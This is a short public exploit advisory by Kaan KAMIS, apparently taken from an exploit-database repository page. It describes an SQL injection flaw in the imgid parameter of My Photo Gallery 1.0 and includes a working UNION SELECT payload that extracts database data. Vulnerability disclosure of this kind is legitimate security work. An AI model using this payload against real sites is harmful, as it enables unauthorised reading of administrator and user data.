2b017ecadf
6 new exploits Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow My Photo Gallery 1.0 - SQL Injection Maian Weblog 4.0 - SQL Injection WordPress Plugin WP Private Messages 1.0.1 - SQL Injection Online Hotel Booking System Pro 1.2 - SQL Injection WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection
30 lines
1.1 KiB
Text
Executable file
30 lines
1.1 KiB
Text
Executable file
Introduction
|
||
|
||
Exploit Title: My Photo Gallery – SQL Injection
|
||
Date: 27.01.2017
|
||
Vendor Homepage: http://software.friendsinwar.com/
|
||
Software Link: http://software.friendsinwar.com/news.php?readmore=40
|
||
Exploit Author: Kaan KAMIS
|
||
Contact: iletisim[at]k2an[dot]com
|
||
Website: http://k2an.com
|
||
Category: Web Application Exploits
|
||
|
||
Overview
|
||
|
||
My Photo Gallery is a free is a user-friendly picture gallery script.
|
||
Users can register and upload their images to the site. A moderator can see the images and validate, edit or delete them.
|
||
The script comes with a very user friendly admin system where you can change and add many things such as: Categories, Images, Edit members, site looks and many more.
|
||
|
||
Type of vulnerability:
|
||
|
||
An SQL Injection vulnerability in My Photo Gallery allows attackers to read
|
||
arbitrary administrator data from the database.
|
||
|
||
Vulnerable Url:
|
||
|
||
http://locahost/my_photo_gallery/image.php?imgid=[payload]
|
||
Vulnerable parameter : imgid
|
||
Mehod : GET
|
||
|
||
Payload:
|
||
imgid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170767a71,0x6652547066744842666d70594d52797173706a516f6c496f4d4b6b646f774d624a614f52676e6372,0x716b766b71)--
|